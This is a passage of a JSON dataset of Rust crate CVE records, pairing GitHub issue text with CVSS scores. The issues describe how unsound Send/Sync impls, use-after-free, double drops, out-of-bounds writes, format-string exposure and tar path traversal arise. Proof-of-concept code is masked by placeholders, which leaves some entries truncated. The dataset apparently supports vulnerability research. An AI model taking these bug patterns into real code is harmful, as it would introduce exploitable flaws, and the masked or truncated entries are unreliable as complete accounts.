        "description": "APITAG allows synchronous use of non Sync types through references. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements Send as long as the underlying type implements Copy . However, one potential problem with this is that (non mutable) references actually implement the Copy trait: URLTAG This makes it possible, for example, to share Cell s across threads by wrapping them in a APITAG : ERRORTAG Output: APITAG Indicating that the same Cell is now usable across threads, potentially allowing for data races.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-25904",
        "Issue_Url_old": "https://github.com/rust-av/rust-av/issues/136",
        "Issue_Url_new": "https://github.com/rust-av/rust-av/issues/136",
        "Repo_new": "rust-av/rust-av",
        "Issue_Created_At": "2021-01-07T17:26:49Z",
        "description": "APITAG can lead to segfault without ERRORTAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description Since APITAG URLTAG doesn't validate its input pointers, it is possible to trigger undefined behavior without using ERRORTAG . Proof of Concept The example program below exhibits segmentation fault caused by dereferncing a null pointer. CODETAG Program Output APITAG NUMBERTAG rustc NUMBERTAG nightly) APITAG Suggested Fix APITAG API could be changed to an ERRORTAG API, since it requires users to check the validity of the input pointers in order to maintain safety guarantees. Thank you for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35863",
        "Issue_Url_old": "https://github.com/hyperium/hyper/issues/1925",
        "Issue_Url_new": "https://github.com/hyperium/hyper/issues/1925",
        "Repo_new": "hyperium/hyper",
        "Issue_Created_At": "2019-09-04T19:34:15Z",
        "description": "Client GET requests with transfer encoding are wrongly stripped. The client wrongly strips ERRORTAG from GET requests, thinking that GET requests shouldn't have payloads. However, FILETAG : > A payload within a GET request message has no defined semantics; > sending a payload body on a GET request might cause some existing > implementations to reject the request. The original implementation was trying to protect from empty APITAG s automatically adding ERRORTAG to a GET request. The fix should probably still protect against that, but if the APITAG header has been explicitly set on the Request , it should be forwarded as is.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35861",
        "Issue_Url_old": "https://github.com/fitzgen/bumpalo/issues/69",
        "Issue_Url_new": "https://github.com/fitzgen/bumpalo/issues/69",
        "Repo_new": "fitzgen/bumpalo",
        "Issue_Created_At": "2020-03-24T05:30:26Z",
        "description": "segfault only in unit test. I'm very confusing current status and don't know what is wrong when I run this code in unit test with cargo test it failed with SIGSEGV Here is my test code URLTAG FILETAG but when I run same code in APITAG then it success FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-25903",
        "Issue_Url_old": "https://github.com/krl/cache/issues/2",
        "Issue_Url_new": "https://github.com/krl/cache/issues/2",
        "Repo_new": "krl/cache",
        "Issue_Created_At": "2021-01-01T10:55:50Z",
        "description": "Exposing internally stored raw pointers is unsafe. Hi, this segfaults with only \"safe\" code (i.e. not using ERRORTAG ): ERRORTAG May I suggest you yank URLTAG your crate? I think it is bad a crate with such basic issues (also see NUMBERTAG is available under the very exposed crate name cache . You could still use your crate outside of the registry by referencing the git repository URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29939",
        "Issue_Url_old": "https://github.com/Alexhuszagh/rust-stackvector/issues/2",
        "Issue_Url_new": "https://github.com/alexhuszagh/rust-stackvector/issues/2",
        "Repo_new": "alexhuszagh/rust-stackvector",
        "Issue_Created_At": "2021-02-19T15:31:01Z",
        "description": "Memory safety issue in APITAG . Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in APITAG , the APITAG 's upper bound is used authoritatively to verify the capacity and then up to APITAG elements are inserted directly into the APITAG : URLTAG However, if an Iterator incorrectly reports a APITAG here with a upper bound smaller than the lower bound, it can cause that first loop to write beyond the capacity of the stack and overwrite the stack. Here's an example: ERRORTAG This outputs: CODETAG As per the APITAG documentation URLTAG : > It is not enforced that an iterator implementation yields the declared number of elements. A buggy iterator may yield less than the lower bound or more than the upper bound of elements. > APITAG is primarily intended to be used for optimizations such as reserving space for the elements of the iterator, but must not be trusted to e.g., omit bounds checks in unsafe code. An incorrect implementation of APITAG should not lead to memory safety violations.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
        "severity": "HIGH",
        "baseScore": 7.3,
        "impactScore": 3.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35882",
        "Issue_Url_old": "https://github.com/SergioBenitez/Rocket/issues/1312",
        "Issue_Url_new": "https://github.com/sergiobenitez/rocket/issues/1312",
        "Repo_new": "sergiobenitez/rocket",
        "Issue_Created_At": "2020-05-27T05:48:51Z",
        "description": "Clone implementation for APITAG is unsound. The Bug APITAG is one of a few places that Rocket uses unsafe Rust. While auditing the code, I found that its Clone implementation is unsound. First, let's look at the definition of APITAG which implements a mutable Rc with a raw pointer: URLTAG The comment justifies that it is safe to have APITAG and APITAG which share the same Request pointer because modification from APITAG is not observable from APITAG However, APITAG Clone implementation allows to create two APITAG that share the same Request raw pointer, which was not part of the justification: URLTAG This ultimately permits the violation of aliasing rule with two APITAG instances that point to the same Request instance. Proof of Concept APITAG code: ERRORTAG Output: ERRORTAG The APITAG was tested on the following environment: Rocket NUMBERTAG latest at the time of writing) OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG nightly (a NUMBERTAG d NUMBERTAG d NUMBERTAG Target NUMBERTAG unknown linux gnu The APITAG used a classic iterator invalidation to show it is possible to overwrite a pointer and a length of a string slice. Is this a security bug? Considering that NUMBERTAG APITAG is intended to be used for testing NUMBERTAG The exact pattern to trigger the bug is unlikely to happen in the wild I believe the security impact of this bug is minimal. I think It is still worthwhile to file a APITAG advisory after the bug confirmation considering the people who want to be notified about unsound APIs URLTAG . Possible Fixes I believe APITAG can be redesigned without breaking APITAG API with safe alternatives such as APITAG URLTAG or APITAG URLTAG . I think it is also possible to fix Clone to clone the internal Request, but the first solution which reduces the number of unsafe code should be preferred if possible.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-16882",
        "Issue_Url_old": "https://github.com/Robbepop/string-interner/issues/9",
        "Issue_Url_new": "https://github.com/robbepop/string-interner/issues/9",
        "Repo_new": "robbepop/string-interner",
        "Issue_Created_At": "2019-08-24T15:00:52Z",
        "description": "Unsoundness (use after free) around APITAG and APITAG . Abstract By steps below, call to APITAG and APITAG cause use after free in APITAG NUMBERTAG Create a APITAG . I'll call it old NUMBERTAG Intern some string NUMBERTAG Clone old . I'll call the newly created interner old . + APITAG NUMBERTAG Drop old . + At this point, all APITAG s in APITAG is also going to be dropped NUMBERTAG Call APITAG or APITAG , passing same string as before. + These functions refer APITAG strings already dropped. This is UB. Code to reproduce CODETAG ERRORTAG The last APITAG should never fail, but it failed in my environment. APITAG is UB so it might success coincidentally...) See APITAG for more detailed explanation.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35898",
        "Issue_Url_old": "https://github.com/actix/actix-net/issues/160",
        "Issue_Url_new": "https://github.com/actix/actix-net/issues/160",
        "Repo_new": "actix/actix-net",
        "Issue_Created_At": "2020-07-19T23:36:06Z",
        "description": "Custom Cell implementation is unsound. Right now there is no mechanism in Cell to track whether a mutable reference to the data is already acquired. Thus it is possible to obtain several mutable references to the same memory location by calling APITAG repeatedly: CODETAG This may result in pretty much arbitrary memory corruption, most likely a use after free. Even though no code internal to Actix makes two obvious calls to APITAG in a row, this behavior has been shown to be exploitable from the public API (see APITAG that fails MIRI URLTAG . PR NUMBERTAG has removed one instance of this Cell and all uses of it. However, there is another copy of it in the repository in APITAG crate, and there are NUMBERTAG calls to APITAG . The obvious fix is to replace all uses of custom APITAG with APITAG (the way it was before the introduction of a custom cell in APITAG like it was done in NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35874",
        "Issue_Url_old": "https://github.com/droundy/internment/issues/11",
        "Issue_Url_new": "https://github.com/droundy/internment/issues/11",
        "Repo_new": "droundy/internment",
        "Issue_Created_At": "2020-04-24T07:58:21Z",
        "description": "Possible race condition in APITAG .. I believe this function has a potential race condition: URLTAG If a concurrent thread creates a new APITAG with the same value as the one being destroyed after we drop the ref count but before we take the mutex, then removing an entry from the map creates a dangling pointer.",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.9,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2020-35885",
        "Issue_Url_old": "https://github.com/pigeonhands/rust-arch/issues/2",
        "Issue_Url_new": "https://github.com/pigeonhands/rust-arch/issues/2",
        "Repo_new": "pigeonhands/rust-arch",
        "Issue_Created_At": "2020-08-20T06:34:53Z",
        "description": "APITAG deallocates a memory region that it doesn't own. URLTAG Description APITAG deallocate a memory region that it doesn't own when APITAG is created without using APITAG . This can introduce memory safety issues such as double free and use after free to client programs. Demonstration Crate: alpm rs Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG d3fb NUMBERTAG a NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-29938",
        "Issue_Url_old": "https://github.com/gnzlbg/slice_deque/issues/90",
        "Issue_Url_new": "https://github.com/gnzlbg/slice_deque/issues/90",
        "Repo_new": "gnzlbg/slice_deque",
        "Issue_Created_At": "2021-02-19T07:27:40Z",
        "description": "Panic safety issue in APITAG Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed a panic safety issue in the APITAG returned by the APITAG function: URLTAG Notably, the code increments APITAG _before_ it calls APITAG which can potentially panic. This means for example, that it can leave the APITAG in an inconsistent state resulting in a double drop. Here is an example: ERRORTAG This outputs: CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35895",
        "Issue_Url_old": "https://github.com/arcnmx/stack-rs/issues/4",
        "Issue_Url_new": "https://github.com/arcnmx/stack-rs/issues/4",
        "Repo_new": "arcnmx/stack-rs",
        "Issue_Created_At": "2020-09-24T09:59:13Z",
        "description": "Missing check in APITAG leads to out of bounds write.. APITAG allows insertion of an element into the array object into the specified index. Due to a missing check on the upperbound of this index, it is possible to write out of bounds. ERRORTAG Issue number NUMBERTAG is pointed out in NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36472",
        "Issue_Url_old": "https://github.com/edarc/max7301/issues/1",
        "Issue_Url_new": "https://github.com/edarc/max7301/issues/1",
        "Repo_new": "edarc/max7301",
        "Issue_Created_At": "2020-12-19T00:05:47Z",
        "description": "Unsound Sync implementation for APITAG and APITAG . Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG URLTAG APITAG and APITAG implement Sync for APITAG . This bound is seemingly unsound; it allows to send a reference of APITAG or APITAG to another thread, and from there a mutable reference of APITAG can be accessed through APITAG APIs. This could result in a thread safety violation when EI is a non Send type. We suggest to add an APITAG bound (or an equivalent APITAG bound) to those Sync implementations, following the stdlib Mutex's Sync implementation URLTAG .",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2018-20996",
        "Issue_Url_old": "https://github.com/crossbeam-rs/crossbeam-epoch/issues/82",
        "Issue_Url_new": "https://github.com/crossbeam-rs/crossbeam-epoch/issues/82",
        "Repo_new": "crossbeam-rs/crossbeam-epoch",
        "Issue_Created_At": "2018-07-25T14:20:11Z",
        "description": "Segfault. I'm not sure exactly which repo this issue belongs in. I just updated to crossbeam NUMBERTAG earlier and am now experiencing segfaults with the following stack trace. Apologies for the lack of pruning: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28037",
        "Issue_Url_old": "https://github.com/droundy/internment/issues/20",
        "Issue_Url_new": "https://github.com/droundy/internment/issues/20",
        "Repo_new": "droundy/internment",
        "Issue_Created_At": "2021-03-03T20:44:14Z",
        "description": "Intern APITAG : Data race allowed on T. Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description APITAG unconditionally implements Sync . This allows users to create data races on APITAG . Such data races can lead to undefined behavior. URLTAG Reproduction Below is an example program that exhibits undefined behavior (memory corruption) using safe APIs of internment . APITAG Detail APITAG APITAG ERRORTAG Output: APITAG Tested Environment Crate: internment Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG cb NUMBERTAG ad5db NUMBERTAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-25907",
        "Issue_Url_old": "https://github.com/strake/containers.rs/issues/2",
        "Issue_Url_new": "https://github.com/strake/containers.rs/issues/2",
        "Repo_new": "strake/containers.rs",
        "Issue_Created_At": "2021-01-12T13:47:29Z",
        "description": "panic safety: double drop may happen within APITAG . Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG Functions mutate & APITAG temporarily duplicate the ownership of an item using the given p (and q ). In case the given function f panics, the duplicated item will be dropped twice. Proof of Concept The given program below exhibits a double free error. ERRORTAG Program Output ERRORTAG Thank you for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-25901",
        "Issue_Url_old": "https://github.com/khuey/lazy-init/issues/9",
        "Issue_Url_new": "https://github.com/khuey/lazy-init/issues/9",
        "Repo_new": "khuey/lazy-init",
        "Issue_Created_At": "2018-05-10T11:04:02Z",
        "description": "potential soundness hole with types that are Sync + APITAG Hi, I believe that the ERRORTAG needs to also require Send. Otherwise it is possible to transfer non Send values between threads. Similar issues in other crates: URLTAG URLTAG CODETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35890",
        "Issue_Url_old": "https://github.com/maciejhirsz/ordnung/issues/8",
        "Issue_Url_new": "https://github.com/maciejhirsz/ordnung/issues/8",
        "Repo_new": "maciejhirsz/ordnung",
        "Issue_Created_At": "2020-09-03T10:08:24Z",
        "description": "Memory safety issues in APITAG . Hello, we have noticed a soundness issue and/or a potential security vulnerability in this crate while performing a security scan on crates.io. Description APITAG contains multiple memory safety issues NUMBERTAG It mishandles large capacity and causes out of bound access in NUMBERTAG bit / allocator layout mismatch in NUMBERTAG bi NUMBERTAG APITAG is not panic safe and causes double free when an index larger than the length is provided. Demonstration Crate: ordnung Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36217",
        "Issue_Url_old": "https://github.com/Xudong-Huang/may/issues/88",
        "Issue_Url_new": "https://github.com/xudong-huang/may/issues/88",
        "Repo_new": "xudong-huang/may",
        "Issue_Created_At": "2020-11-10T05:37:27Z",
        "description": "Queue needs bounds on its APITAG traits. Currently, it is possible to use APITAG and APITAG to send across types that aren't safe to use in other threads. Due to the guarantee about there only being one popper, I think it should be APITAG when T is Send . Here's a demonstration with a data race using Cells: ERRORTAG which outputs: APITAG APITAG found by Rust group at APITAG gatech)",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2019-15544",
        "Issue_Url_old": "https://github.com/stepancheg/rust-protobuf/issues/411",
        "Issue_Url_new": "https://github.com/stepancheg/rust-protobuf/issues/411",
        "Repo_new": "stepancheg/rust-protobuf",
        "Issue_Created_At": "2019-05-14T11:42:31Z",
        "description": "Incorporate OOM fix in next release APITAG Please incorporate commit URLTAG from master in the next release APITAG In particular, please incorporate the following OOM fix: URLTAG URLTAG URLTAG URLTAG We hit this OOM error while fuzzing a project that uses the current release NUMBERTAG Patching NUMBERTAG with the above commit made the error go away. It would be convenient if the commit were incorporated in an official release. Thank you.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20995",
        "Issue_Url_old": "https://github.com/gnzlbg/slice_deque/issues/57",
        "Issue_Url_new": "https://github.com/gnzlbg/slice_deque/issues/57",
        "Repo_new": "gnzlbg/slice_deque",
        "Issue_Created_At": "2018-12-03T00:43:26Z",
        "description": "APITAG causing memory corruption APITAG This took me a long while to figure out, but I narrowed it down to just a single line: APITAG The elements are simple APITAG structs; the first println outputs the queue in its normal state, whereas in the second all values are like NUMBERTAG or NUMBERTAG This only happens in a quickcheck like test suite where the queue is used super intensively, and pushes/pop are done thousands of times (it constantly fails at the same spot though). I could try running it through valgrind if it helps, not sure how else I could help. Is this a known issue perhaps?",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35857",
        "Issue_Url_old": "https://github.com/bluejekyll/trust-dns/issues/980",
        "Issue_Url_new": "https://github.com/bluejekyll/trust-dns/issues/980",
        "Repo_new": "bluejekyll/trust-dns",
        "Issue_Created_At": "2020-01-04T10:07:00Z",
        "description": "thread 'trust dns server runtime' has overflowed its stack. Describe the bug Sometimes the server crashes after few seconds or after a few hours: ERRORTAG ~~To Reproduce~~ Steps to the behavior. Sorry, it doesn't seem reliably reproducible at the moment. I'll add more info, as soon I get more. APITAG Expected behavior No stack overflow. System: OS: Debian Architecture NUMBERTAG ersion: Testing rustc version NUMBERTAG e NUMBERTAG ersion: Crate: trust dns Version NUMBERTAG Additional context ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-28033",
        "Issue_Url_old": "https://github.com/wwylele/byte-struct-rs/issues/1",
        "Issue_Url_new": "https://github.com/wwylele/byte-struct-rs/issues/1",
        "Repo_new": "wwylele/byte-struct-rs",
        "Issue_Created_At": "2021-03-01T18:31:09Z",
        "description": "FILETAG to avoid this problem.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15547",
        "Issue_Url_old": "https://github.com/RustSec/advisory-db/issues/106",
        "Issue_Url_new": "https://github.com/rustsec/advisory-db/issues/106",
        "Repo_new": "rustsec/advisory-db",
        "Issue_Created_At": "2019-06-09T08:04:30Z",
        "description": "Format string vulnerabilities (and more) in multiple safe curses wrapper crates.. I've noticed potentially exploitable security vulnerabilities in the following crates NUMBERTAG which can be triggered by users of these libraries without writing unsafe code. I'm filing an issue rather than a PR since I don't know that I have time to see this through to it's conclusion, especially since multiple crates and several functions are involved. The FAQ [indicates that this is okay URLTAG . pancurses The crate URLTAG exposes the functions APITAG and APITAG as safe functions (I think this is all of them, but could be wrong), despite these passing an arbitrary rust str to into C code which expects to receive a printf style format string. This can lead to a format string vulnerability URLTAG . I filed URLTAG about this, shortly before filing this issue. ncurses The crate URLTAG exposes the functions printw , mvprintw , and mvwprintw as safe functions, which have the same issues described above. In URLTAG I raised this issue about printw (but missed that it wasn't just printw ), which lead to that functions deprecation NUMBERTAG When writing this issue for the advisory db, I noticed the existence of the other two functions. I don't see any other functions accepting format strings (the scanw functions, mercifully, are not exposed). Additionally, while filing this bug, I noticed the following additional vulnerabilities or memory safety issues (I haven't filed issues in the ncurses crate's repository about these): [ instr URLTAG is exposed, which has a buffer overflow (the curses instr function is somewhat similar to the gets function from the C stdlib, in that writes as much text that it wants into a lengthless buffer pointer). Several functions NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG URLTAG write data from the terminal directly into a String's underlying buffer, when the data may not be valid UTF NUMBERTAG I don't know if this can be exploited, but it's a minor memory safety issue nonetheless. I have not done a very thorough look, these are just the most obvious problems to me. Ideally, someone more familiar with the ncurses API would look further NUMBERTAG For total clarity, I didn't look at any others. It seems plausible to me that other Rust curses libs have similar mistakes, since it's a very hard API to use safely. That said, I think these are the most popular ones (not that that makes things any better NUMBERTAG I don't really feel that deprecation is sufficient, as the function is still present (and not ERRORTAG ). Transitive dependency deprecations aren't reported, so rust code consuming this crate transitively could still be at risk. However, if the members of this repository disagree, then one fewer of the ncurses crates functions are problematic in the current release.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2019-15547",
        "Issue_Url_old": "https://github.com/jeaye/ncurses-rs/issues/172",
        "Issue_Url_new": "https://github.com/jeaye/ncurses-rs/issues/172",
        "Repo_new": "jeaye/ncurses-rs",
        "Issue_Created_At": "2018-11-27T00:28:15Z",
        "description": "printw should not be exposed.. It's very difficult / impossible to use this function from rust without introducing a format string vulnerability into your code (which can be used to trigger arbitrary code execution). If you must expose something like it, have it just call addstr or mark it as unsafe (and deprecate it in both cases, IMO). See also NUMBERTAG and NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2021-38511",
        "Issue_Url_old": "https://github.com/alexcrichton/tar-rs/issues/238",
        "Issue_Url_new": "https://github.com/alexcrichton/tar-rs/issues/238",
        "Repo_new": "alexcrichton/tar-rs",
        "Issue_Created_At": "2020-09-10T13:27:37Z",
        "description": "unpack_in allows creating directories outside the dst directory. The following code will create the folders exploit and APITAG outside of the demo folder: ERRORTAG ERRORTAG calls APITAG ( APITAG URLTAG on the untrusted path and therefore can create directories outside of the dst directory. APITAG The provided code will fail with the expected error that APITAG is outside of demo , but the parent directories are already created outside of the demo folder. This is kind of related to NUMBERTAG but still works in the current master.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36218",
        "Issue_Url_old": "https://github.com/buttplugio/buttplug-rs/issues/225",
        "Issue_Url_new": "https://github.com/buttplugio/buttplug/issues/225",
        "Repo_new": "buttplugio/buttplug",
        "Issue_Created_At": "2020-12-19T01:33:06Z",
        "description": "APITAG allows data race to APITAG objects. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue ( Describe the bug ) Send / Sync are unconditionally implemented for APITAG , and thus it is possible to cause a data race to a ( APITAG | APITAG ) object. ERRORTAG Proof of Concept ( Actual behavior ) Below is an example program that segfaults while using APITAG . The segfault behavior was observed when the program was built with APITAG in Debug mode, and run on APITAG . The program below allows two threads to concurrently access the same Cell (one thread writes to Cell while the other thread reads from Cell ). ERRORTAG Suggested Solution Adding APITAG bound to the Send impl & APITAG bound to the Sync impl can prevent code like the above to be revoked by the compiler. ERRORTAG Thank you for reviewing this issue :crab:",
        "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.9,
        "impactScore": 3.6,
        "exploitabilityScore": 2.2
    },
    {
        "CVE_ID": "CVE-2021-25905",
        "Issue_Url_old": "https://github.com/Enet4/bra-rs/issues/1",
        "Issue_Url_new": "https://github.com/enet4/bra-rs/issues/1",
        "Repo_new": "enet4/bra-rs",
        "Issue_Created_At": "2021-01-02T17:38:01Z",
        "description": "reading on uninitialized buffer can cause UB ( APITAG ). Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation ( APITAG ). This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Suggested Fix It is safe to zero initialize the newly allocated APITAG buffer before APITAG , in order to prevent user provided Read from reading old contents of the newly allocated heap memory. The version available on APITAG seems to be different from the latest master branch of this repo, but the same issue exists in APITAG (bra NUMBERTAG Thank you for checking out this issue NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.1,
        "impactScore": 5.2,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-36443",
        "Issue_Url_old": "https://github.com/libp2p/rust-libp2p/issues/1932",
        "Issue_Url_new": "https://github.com/libp2p/rust-libp2p/issues/1932",
        "Repo_new": "libp2p/rust-libp2p",
        "Issue_Created_At": "2021-01-24T23:18:34Z",
        "description": "Undefined data exposed in APITAG APITAG implementation. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG 's implementation of APITAG does the following: URLTAG This sets up uninitialized bytes in APITAG and then passes it to the user provided APITAG method. This allows invoking undefined behavior from safe Rust code, reading uninitialized memory. This issue is described a bit in the documentation for FILETAG : > It is your responsibility to make sure that buf is initialized before calling read. Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Here's an example that outputs uninitialized memory using this: APITAG APITAG to expand APITAG ERRORTAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2020-35902",
